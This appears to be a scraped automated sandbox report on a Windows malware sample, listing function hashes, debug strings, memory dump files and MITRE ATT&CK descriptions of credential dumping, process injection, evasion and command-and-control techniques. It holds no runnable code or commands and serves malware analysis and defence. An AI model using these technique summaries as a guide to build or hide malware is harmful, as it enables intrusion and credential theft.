Instruction Fuzzy Hash: 2811A971610A50ABC714DBAAE991E9DB7F4AF25350F64882AE885E3A80C330FE10CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E70CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E70CF

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E710E
object != nullptr, xrefs: 001E7113

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 916063d3da85223714a7e6bf08916900ef1086d46f640f2aec9e0df6e45cbc7a
Instruction ID: 329dd0bd47c8fcb5cf8b97567ed185aaa741d960163a0b268d8ea8a5bd056a7f
Opcode Fuzzy Hash: 916063d3da85223714a7e6bf08916900ef1086d46f640f2aec9e0df6e45cbc7a
Instruction Fuzzy Hash: BBF06DB2E50314ABC730EFA8A402A8EBBF4EB59B50F10053BF949E7781D77086148BD1

Uniqueness

Uniqueness Score: -1.00%

Function 001E653C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E6541

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E6588
object != nullptr, xrefs: 001E658D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 19e8ada2fc8b48ea286f0adfd5fba695d05b6e6f4c29189d2cd30ac324c45336
Instruction ID: b7f607ab3eafc11ea4c2ea7a7044160a3d10dd448fd87bf587e13a623fcfd5c3
Opcode Fuzzy Hash: 19e8ada2fc8b48ea286f0adfd5fba695d05b6e6f4c29189d2cd30ac324c45336
Instruction Fuzzy Hash: 2CF04FB1E503159FC751DFA89806749BBF4EF09B50F10817AE889EB381EA708614CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001E65A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E65AE

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E65E4
object != nullptr, xrefs: 001E65E9

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: ab95c166c82e6c67512bebebd3d9210412781a9bc4a169b8bd71c39e3cb131e2
Instruction ID: 365eb8ea1a1c1909bb88ec7bf09a3ad941e674127050d1ce66c62be06d6345f5
Opcode Fuzzy Hash: ab95c166c82e6c67512bebebd3d9210412781a9bc4a169b8bd71c39e3cb131e2
Instruction Fuzzy Hash: C8F0E5B2E60224A7CB21EBA4950379EB7B49F15B50F000177E841B33C1D7B04B148BC1

Uniqueness

Uniqueness Score: -1.00%

Function 001C9146, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 001C915A

Strings

string too long, xrefs: 001C9146
4hU@[Y]W, xrefs: 001C9154

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::exception::exception
String ID: 4hU@[Y]W$string too long
API String ID: 2807920213-1996204750
Opcode ID: 6aa953bca79b890aa3fdc11543d8a278556efc1df4d782a1e6c052fa4dc7e9b9
Instruction ID: a690e0cfdf24a4ead789a40d5657778c0d5aa27203555ab09fb2a290257ffe35
Opcode Fuzzy Hash: 6aa953bca79b890aa3fdc11543d8a278556efc1df4d782a1e6c052fa4dc7e9b9
Instruction Fuzzy Hash: 31C012722003286342243A956806896BE49DA62BB0B50042ABB4446601DBB2947042D1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report eLZzxG56uH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 001F7819, Relevance: 102.7, APIs: 13, Strings: 45, Instructions: 1169
COMMONCrypto

Function 001F628C, Relevance: 88.6, APIs: 37, Strings: 13, Instructions: 1081
registryCOMMONCrypto

Function 001EA2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434
stringlibraryloaderCOMMONCrypto

Function 001E10B1, Relevance: 46.8, APIs: 7, Strings: 19, Instructions: 1335
COMMONCrypto

Function 001E06DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607
libraryloaderCOMMONCrypto

Function 001E9F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169
encryptionstringCOMMON

Function 001EA130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97
stringencryptionCOMMON

Function 001FE2E4, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 469
COMMONCrypto

Function 001DFD36, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 404
timeCOMMONCrypto

Function 001F73C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349
registryCOMMONCrypto

Function 001F44AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276
fileCOMMON

Function 001F5346, Relevance: 24.1, APIs: 3, Strings: 13, Instructions: 102
stringCOMMON

Function 001E032E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 188
filetimeCOMMON

Function 001F8DFD, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 65
memoryCOMMON

Function 001F4ECD, Relevance: 15.1, APIs: 10, Instructions: 102
stringregistryCOMMON

Function 0021984D, Relevance: 13.8, APIs: 9, Instructions: 301
COMMON

Function 001D6EAD, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 322
COMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre